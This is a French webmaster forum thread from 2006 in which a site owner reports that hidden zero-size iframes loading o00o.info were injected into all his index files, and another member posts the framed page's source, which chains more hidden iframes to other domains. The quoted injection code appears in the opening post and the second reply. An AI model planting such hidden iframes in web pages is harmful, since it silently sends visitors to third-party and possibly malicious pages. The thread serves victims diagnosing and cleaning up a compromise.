On s'est fait hacker ?
17 messages
• Page 1 sur 2 • 1, 2
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
-
Franck - Nouveau WRInaute

- Messages: 15
- Inscription: 20 Nov 2002
On s'est fait hacker ?
Bonjour,
Nous étions content que notre site soit valide soit valide XHTML1...
Mais depuis quelques temps 34 fautes sont apparues... J'ai pensé à des problèmes dans le code...
Mais finalement nous avons trouvé un code similaire dans tous nos fichiers index même sur des répertoires contenant de simples essais de cms non référencés par google...
Je suis surpris ! Et je me demande si d'autres personnes ont eu le même problème... ?
Auriez-vous des conseils au niveau sécurité serveur, meme si à priori nos le failles de sécurité sont à jour.
Voici le code en question qui était inséré en dehors du body
(
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Merci pour votre aide !!!
Franck
Nous étions content que notre site soit valide soit valide XHTML1...
Mais depuis quelques temps 34 fautes sont apparues... J'ai pensé à des problèmes dans le code...
Mais finalement nous avons trouvé un code similaire dans tous nos fichiers index même sur des répertoires contenant de simples essais de cms non référencés par google...
Je suis surpris ! Et je me demande si d'autres personnes ont eu le même problème... ?
Auriez-vous des conseils au niveau sécurité serveur, meme si à priori nos le failles de sécurité sont à jour.
Voici le code en question qui était inséré en dehors du body
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Merci pour votre aide !!!
Franck
Dernière édition par Franck le Ven Aoû 25, 2006 17:26, édité 1 fois.
- kool76
- Nouveau WRInaute

- Messages: 31
- Inscription: 24 Sep 2004
J'allais faire la même remarque
Et compléter par le code source de la page de la frame :
Un hack qui ne sert que des intérêts financiers je pense...
Et compléter par le code source de la page de la frame :
- Code: Tout sélectionner
<iframe width=0 height=0 src=http://www.donefind.com/smartppc/portal.php?affzb=1&username=yoho></iframe><iframe width=0 height=0 src=http://www.hadbest.net/search/portal.php?affzb=1&username=xiz></iframe><iframe width=0 height=0 src=http://www.slowern.com/search/portal.php?username=had></iframe>
Un hack qui ne sert que des intérêts financiers je pense...
-

david96 - WRInaute passionné

- Messages: 1430
- Inscription: 28 Aoû 2005
J'ai regardé ton code source et je n'y ai point vu de <iframe....> après le </body>
De plus chez moi ta page est bien valide Xhtml T
Ça pourrait peut être venir d'un soft que tu as en local, ça m'avais fait un cas similaire avec Norton (que j'ai désinstallé depuis belle lurette maintenant
)
De plus chez moi ta page est bien valide Xhtml T
Ça pourrait peut être venir d'un soft que tu as en local, ça m'avais fait un cas similaire avec Norton (que j'ai désinstallé depuis belle lurette maintenant
-
Franck - Nouveau WRInaute

- Messages: 15
- Inscription: 20 Nov 2002
Sur notre site principal c'est normal on l'a retiré...
Mais c'est encore sur des sous-repertoires de cms que l'on a testé...
En fait ce code c'est inseré dans tous nos fichiers index...
Exemple d'url ou on ne l'a pas encore retiré :
Remplacez le Z par un y
http://www.experts-referencement.com/Zacs/
c'est tout en bas du code de cette page..
Mais c'est encore sur des sous-repertoires de cms que l'on a testé...
En fait ce code c'est inseré dans tous nos fichiers index...
Exemple d'url ou on ne l'a pas encore retiré :
Remplacez le Z par un y
http://www.experts-referencement.com/Zacs/
c'est tout en bas du code de cette page..
-
Franck - Nouveau WRInaute

- Messages: 15
- Inscription: 20 Nov 2002
Je me disais qu'il avait peut être développe un script qui exploite les failles de sécurité et qui modifie les fichiers index...
ça lui génère peut être des milliers de liens !!!
En tout cas ça doit être automatisé car il a inséré ça dans tous nos index...
ça lui génère peut être des milliers de liens !!!
En tout cas ça doit être automatisé car il a inséré ça dans tous nos index...
-

mahefarivony - WRInaute accro

- Messages: 11405
- Inscription: 14 Oct 2002
amusant de lire les memes sujets (au fait édites ton titres) sur les forums de webmastering
un lien interessant
http://forum.joomla.org/index.php?topic=86820.0
un lien interessant
http://forum.joomla.org/index.php?topic=86820.0
-

Audiofeeline - WRInaute accro

- Messages: 5257
- Inscription: 20 Oct 2005
C'est le principal probleme des scripts populaires (phpbb & co)...
Ceci-dit ce cms est plutôt bien fait...
Ceci-dit ce cms est plutôt bien fait...
17 messages
• Page 1 sur 2 • 1, 2
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités

